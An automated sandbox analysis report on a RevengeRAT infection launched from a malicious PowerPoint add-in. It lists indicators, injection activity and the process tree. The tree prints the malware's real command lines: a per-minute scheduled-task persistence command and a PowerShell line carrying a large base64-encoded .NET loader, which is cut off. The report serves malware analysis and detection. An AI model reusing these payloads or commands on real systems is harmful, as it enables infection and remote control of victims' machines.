revengerat | 677e627bb513c3cffe86522797f6350e98de398681851ebc7a33afc583390448

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chromeudata.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chromeudata.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chromeudata.lnk	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
30	pastebin.com
31	pastebin.com
36	pastebin.com
57	pastebin.com
59	pastebin.com
68	pastebin.com
70	pastebin.com

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2684 set thread context of 1700	2684	powershell.exe	95
PID 1068 set thread context of 2116	1068	powershell.exe	105
PID 4448 set thread context of 4772	4448	powershell.exe	113

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2684	powershell.exe
1068	powershell.exe
4448	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0	InstallUtil.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	InstallUtil.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3940	schtasks.exe
3464	schtasks.exe
2312	schtasks.exe

Script User-Agent 6 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	32	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	57	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	58	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	68	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	69	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4840	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2684	powershell.exe
2684	powershell.exe
1068	powershell.exe
1068	powershell.exe
4448	powershell.exe
4448	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeDebugPrivilege	4448	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4840	POWERPNT.EXE
4840	POWERPNT.EXE
4840	POWERPNT.EXE

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 4840 wrote to memory of 2032	4840	POWERPNT.EXE	88
PID 4840 wrote to memory of 2032	4840	POWERPNT.EXE	88
PID 2032 wrote to memory of 1364	2032	wscript.exe	89
PID 2032 wrote to memory of 1364	2032	wscript.exe	89
PID 2032 wrote to memory of 3940	2032	wscript.exe	91
PID 2032 wrote to memory of 3940	2032	wscript.exe	91
PID 2032 wrote to memory of 2684	2032	wscript.exe	93
PID 2032 wrote to memory of 2684	2032	wscript.exe	93
PID 2684 wrote to memory of 1700	2684	powershell.exe	95
PID 2684 wrote to memory of 1700	2684	powershell.exe	95
PID 2684 wrote to memory of 1700	2684	powershell.exe	95
PID 2684 wrote to memory of 1700	2684	powershell.exe	95
PID 2684 wrote to memory of 1700	2684	powershell.exe	95
PID 2684 wrote to memory of 1700	2684	powershell.exe	95
PID 2684 wrote to memory of 1700	2684	powershell.exe	95
PID 2684 wrote to memory of 1700	2684	powershell.exe	95
PID 1052 wrote to memory of 3416	1052	WScript.exe	99
PID 1052 wrote to memory of 3416	1052	WScript.exe	99
PID 1052 wrote to memory of 3464	1052	WScript.exe	101
PID 1052 wrote to memory of 3464	1052	WScript.exe	101
PID 1052 wrote to memory of 1068	1052	WScript.exe	103
PID 1052 wrote to memory of 1068	1052	WScript.exe	103
PID 1068 wrote to memory of 2116	1068	powershell.exe	105
PID 1068 wrote to memory of 2116	1068	powershell.exe	105
PID 1068 wrote to memory of 2116	1068	powershell.exe	105
PID 1068 wrote to memory of 2116	1068	powershell.exe	105
PID 1068 wrote to memory of 2116	1068	powershell.exe	105
PID 1068 wrote to memory of 2116	1068	powershell.exe	105
PID 1068 wrote to memory of 2116	1068	powershell.exe	105
PID 1068 wrote to memory of 2116	1068	powershell.exe	105
PID 3660 wrote to memory of 2484	3660	WScript.exe	107
PID 3660 wrote to memory of 2484	3660	WScript.exe	107
PID 3660 wrote to memory of 2312	3660	WScript.exe	109
PID 3660 wrote to memory of 2312	3660	WScript.exe	109
PID 3660 wrote to memory of 4448	3660	WScript.exe	111
PID 3660 wrote to memory of 4448	3660	WScript.exe	111
PID 4448 wrote to memory of 4772	4448	powershell.exe	113
PID 4448 wrote to memory of 4772	4448	powershell.exe	113
PID 4448 wrote to memory of 4772	4448	powershell.exe	113
PID 4448 wrote to memory of 4772	4448	powershell.exe	113
PID 4448 wrote to memory of 4772	4448	powershell.exe	113
PID 4448 wrote to memory of 4772	4448	powershell.exe	113
PID 4448 wrote to memory of 4772	4448	powershell.exe	113
PID 4448 wrote to memory of 4772	4448	powershell.exe	113

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\COMPROVANTE DE PAGAMENTO.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4840
- C:\Windows\SYSTEM32\wscript.exe
  wscript C:\Users\Admin\AppData\Roaming/úùÆüÔ.js
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2032
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /delete /tn Chromeupd /f
    3⤵
    PID:1364
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /tn Chromeupd /tr "C:\Users\Admin\AppData\Local\Temp\Chromeglogge.js" /sc minute /mo 1
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $bFjDJ = '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cHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAU3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBHdWlkQXR0cmlidXRlAEVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAU3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGUASGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAT2JmdXNjYXRpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBZYW5vQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBnZXRfVmFsdWUAc2V0X1ZhbHVlAEdldE9iamVjdFZhbHVlAE5ld0xhdGVCaW5kaW5nAHNldF9FbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEZyb21CYXNlNjRTdHJpbmcARG93bmxvYWRTdHJpbmcAVG9TdHJpbmcAR2V0Rm9sZGVyUGF0aABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuTXlTZXJ2aWNlcy5JbnRlcm5hbABTeXN0ZW0uQ29tcG9uZW50TW9kZWwATGF0ZUNhbGwAQ2xhc3NMaWJyYXJ5My5kbGwAc2V0X1NlY3VyaXR5UHJvdG9jb2wAU3lzdGVtAFRyaW0AQm9vbGVhbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4AVmVyc2lvbgBTeXN0ZW0uQ29uZmlndXJhdGlvbgBTeXN0ZW0uR2xvYmFsaXphdGlvbgBJbnRlcmFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBFeGNlcHRpb24ATWV0aG9kSW5mbwBDdWx0dXJlSW5mbwBsaXhvbwBsaXhvAFNwZWNpYWxGb2xkZXIAUmVzb3VyY2VNYW5hZ2VyAFNlcnZpY2VQb2ludE1hbmFnZXIAVXNlcgBDb21wdXRlcgBUb0xvd2VyAENsZWFyUHJvamVjdEVycm9yAFNldFByb2plY3RFcnJvcgBBY3RpdmF0b3IALmN0b3IALmNjdG9yAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5EZXZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5BcHBsaWNhdGlvblNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SZXNvdXJjZXMAQ2xhc3NMaWJyYXJ5My5SZXNvdXJjZXMucmVzb3VyY2VzAFN0cmluZ3MAUmVmZXJlbmNlRXF1YWxzAENvbnRhaW5zAFJ1bnRpbWVIZWxwZXJzAENvbmNhdABDcmVhdGVPYmplY3QAR2V0T2JqZWN0AExhdGVHZXQAU3lzdGVtLk5ldABMYXRlU2V0AFdlYkNsaWVudABFbnZpcm9ubWVudABDb252ZXJ0AFN5c3RlbS5UZXh0AGdldF9Bc3NlbWJseQBFbXB0eQAAL0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBSAGUAcwBvAHUAcgBjAGUAcwAAG0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEAAAVqAHMAAAcuAGoAcwAAAzMAABtXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsAAABAB1DAHIAZQBhAHQAZQBTAGgAbwByAHQAYwB1AHQAAANcAAAJLgBsAG4AawAAFVQAYQByAGcAZQB0AFAAYQB0AGgAABlJAGMAbwBuAEwAbwBjAGEAdABpAG8AbgAAIWkAbQBhAGcAZQByAGUAcwAuAGQAbABsACwAIAAyADcAABdXAGkAbgBkAG8AdwBTAHQAeQBsAGUAAAlTAGEAdgBlAABFawByAG8AdwBlAG0AYQByAEYAXABUAEUATgAuAHQAZgBvAHMAbwByAGMAaQBNAFwAcwB3AG8AZABuAGkAVwBcADoAQwAAFzkAMQAzADAAMwAuADAALgA0AHYAXAAAKUMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBDAGwAYQBzAHMAMQAAB1IAdQBuAAAhXABJAG4AcwB0AGEAbABsAFUAdABpAGwALgBlAHgAZQAAAPneo+4+E3ZLj7wJCeN45/AAAyAAAQUgAQEREQYVEigBEgwGFRIoARIIBhUSKAESGQYVEigBEiQEIAATAAQAARwcBCABAhwDIAAIBgABEikRLQMgAA4CHgAFEAEAHgAGFRI1ARMABhUSKAETAAcGFRI1ARMAAhMABSABARMABQACAhwcBCAAEkEGIAIBDhJBAh0FBiACHA4SPQYAARJJEkkCBg4EIAECDgUAAhwODgUAAQ4RYQcABA4ODg4OEAAHHBwSKQ4dHB0OHRIpHQIOAAYBHBIpDh0cHQ4dEikCHRwRAAgcHBIpDh0cHQ4dEikdAgIFAAEBEk0DAAABBQABARFxBAAAEnUFIAEBEnUEIAEODgQAAQ4OBQACDg4OBAAAEn0GIAESQR0FBSABEikOBiABEoCBDgUAAR0FDgYgAhwcHRwEIAEBCAQgAQEOBCABAQIHIAQBDg4ODgQHARIMBAcBEggEBwESGQQHARIkBwcDEjkCEjkEBwESPQUHAh0FHAQHARIYEwcNDg4CAgIcHBJNDhJRDhJREk0DBwEOAwcBAgMHAQgEBwESKQUHAh4AAgQKAR4ABwcDEwATAAIECgETAAiwP19/EdUKOgi3elxWGTTgiRAxAC4AMAAuADEANQAuADAABwYVEigBEgwHBhUSKAESCAcGFRIoARIZBwYVEigBEiQDBhI5AwYSPQMGEhgEAAASDAQAABIIBAAAEhkEAAASJAQAABI5BAAAEj0FAAEBEj0EAAAdBQQAABIYCQAGAQ4ODg4ODgQgABIpBxABAR4AHgAHMAEBARAeAAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwESAQANQ2xhc3NMaWJyYXJ5MwAABQEAAAAAFwEAEkNvcHlyaWdodCDCqSAgMjAyNAAAKQEAJGQwNTU5ZWVjLTAwNDItNDFlZC1iZTUyLTNmMTk1Y2FhMGFjMQAADAEABzEuMC4wLjAAAEkBABouTkVURnJhbWV3b3JrLFZlcnNpb249djQuOAEAVA4URnJhbWV3b3JrRGlzcGxheU5hbWUSLk5FVCBGcmFtZXdvcmsgNC44BAEAAAAIAQABAAAAAAAIAQACAAAAAABhAQA0U3lzdGVtLldlYi5TZXJ2aWNlcy5Qcm90b2NvbHMuU29hcEh0dHBDbGllbnRQcm90b2NvbBJDcmVhdGVfX0luc3RhbmNlX18TRGlzcG9zZV9fSW5zdGFuY2VfXwAAAB0BAAEAVAIVU3RyaXBBZnRlck9iZnVzY2F0aW9uAADgKAAAzsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAABAAAAAAAAAFBBRFBBRFAlxm9VAAAAANsAAAAaQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAAAAAAIAAoAABNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dyYW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAYgRyZgAAAAAAAAAA4AAiIAsBUAAAIAAAAAYAAAAAAAASPwAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAwD4AAE8AAAAAQAAAmAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAAAAAALnRleHQAAAAYHwAAACAAAAAgAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAmAMAAABAAAAABAAAACIAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAmAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAPQ+AAAAAAAASAAAAAIABQCMKQAAfBQAAAEAAAAAAAAACD4AALgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoAQAACioeAigDAAAKKhMwCABJAAAAAAAAAHMEAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MFAAAKgAIAAAQXK+BzBgAACoADAAAEGCvTcwcAAAqABAAABBkrxioAAAATMAEAEwAAAAEAABEXKwEWLAB+AQAABG8IAAAKCgYqABMwAQATAAAAAgAAERcrARYsAH4CAAAEbwkAAAoKBioAEzABABMAAAADAAARFysBFiwAfgMAAARvCgAACgoGKgATMAEAEwAAAAQAABEXKwEWLAB+BAAABG8LAAAKCgYqABMwAgBXAAAABQAAEX4FAAAEFCgaAAAKCxYrARZFAwAAAAIAA